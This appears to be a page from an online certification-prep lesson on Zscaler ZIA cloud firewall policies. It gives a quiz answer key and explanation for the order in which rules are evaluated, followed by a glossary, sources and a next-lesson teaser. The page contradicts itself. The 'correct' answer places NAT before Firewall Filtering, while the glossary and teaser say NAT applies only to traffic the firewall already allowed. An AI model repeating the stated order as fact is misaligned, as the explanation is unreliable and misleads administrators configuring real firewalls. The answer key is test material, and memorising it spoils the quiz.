Correct: a. DNS resolves first, NAT then rewrites addresses, Firewall Filtering applies the core allow/deny, FTP Control handles file-transfer specifics, and IPS Control inspects last — so the real order is DNS → NAT → Firewall Filtering → FTP → IPS. Option b feels natural if you assume the main Firewall Filtering ruleset must run before everything else — but DNS and NAT have to act earlier so names resolve and addresses translate before filtering. Option c puts IPS first, which sounds security-minded, yet deep signature inspection runs last on traffic that survived the earlier gates. Option d describes a parallel "strictest wins" model that some next-gen appliances market — ZIA instead uses a fixed sequential order, so simultaneous evaluation is simply not how it works.
Lesson complete — saved to your profile.
Almost! You need 70% (7 of 10) — re-read the path that tripped you up and tap "Try again".

🧠 In your own words

Type one line: In one line, why does IPS Control only inspect traffic the firewall already allowed? Then compare to the expert version.

Expert version: Because IPS sits after Firewall Filtering in the pipeline — the firewall first decides which sessions are permitted, and IPS then inspects only those permitted sessions for exploit signatures, since blocked traffic has already been dropped and has no payload left to scan.

🗣 Teach a friend

Best way to lock it in — explain it in one line to a teammate. Tap to generate a paste-ready summary.

📖 Glossary

Firewall Filtering
Stateful L3/L4 engine that allows or blocks sessions by matching the 5-tuple (source/dest IP, source/dest port, protocol).
DNS Control
Inspects and controls DNS lookups at the Service Edge, including tunnel detection and resolver redirection, before the firewall sees the session.
FTP Control
Governs file-transfer sessions — native FTP from known locations and FTP-over-HTTP for Client Connector — under URL Filtering precedence.
IPS Control
Signature intrusion prevention on firewall-allowed non-web traffic; ships a default ALLOW, so you add explicit IPS Reset blocks yourself.
NAT Control
Translates and redirects destination IP/port for allowed sessions, letting you forward or pin traffic to a chosen address.
Advanced Cloud Firewall (ZS-CTP-1 / ZIA-FIREWALL)
The paid tier that unlocks DNS Control, FTP Control, IPS Control, and tunnel/custom features beyond Basic's L3/L4 filtering.
ZTR / Ghost IP
Zscaler Trusted Resolver — a trusted DNS resolver reached over tunnels via internal "Ghost IPs" so clients can't hit rogue public resolvers.
DoH (DNS over HTTPS)
DNS queries wrapped inside HTTPS on port 443, which hides them from port-53 rules unless you explicitly block native DoH.
ECS (EDNS Client Subnet)
An EDNS extension that passes part of the client's subnet to the resolver so answers are geolocated to the real user, not the resolver.
Default rule
The catch-all bottom rule — for Firewall Filtering it is Block all, but for IPS Control it is Allow, which is the opposite of what most expect.

📚 Sources

  1. Zscaler Help — About Firewall Control. help.zscaler.com/zia/about-firewall-control
  2. Zscaler Help — Configuring the Firewall Filtering Policy. help.zscaler.com/zia/configuring-firewall-filtering-policy
  3. Zscaler Help — About DNS Control. help.zscaler.com/zia/about-dns-control
  4. Zscaler Help — Configuring the IPS Control Policy. help.zscaler.com/zia/configuring-ips-control-policy
  5. Zscaler Help — About FTP Control. help.zscaler.com/zia/about-ftp-control
  6. Zscaler — ZIA Policy Leading Practices Guide (evaluation order). help.zscaler.com/zscaler-deployments-operations/zia-policy-leading-practices-guide
  7. Zscaler ThreatLabz (Oct 2025) — How Non-Web Protocols Are Redefining the Attack Surface (DNS abuse 83.8%). zscaler.com/blogs/security-research
  8. NVD — CVE-2025-20333 (Cisco ASA/FTD WebVPN, CVSS 9.9). nvd.nist.gov/vuln/detail/cve-2025-20333
  9. Zscaler — Digital Transformation Administrator (ZDTA) blueprint. zscaler.com/resources/brochures

What's next?

Next up: Zscaler ZIA NAT Control — how to translate and pin allowed sessions to a destination of your choosing. You'll see why NAT runs only on traffic the firewall already permitted, and where it slots into the same first-match pipeline.

Next · Browse all ZIA lessons → Practice on exam.techclick.in →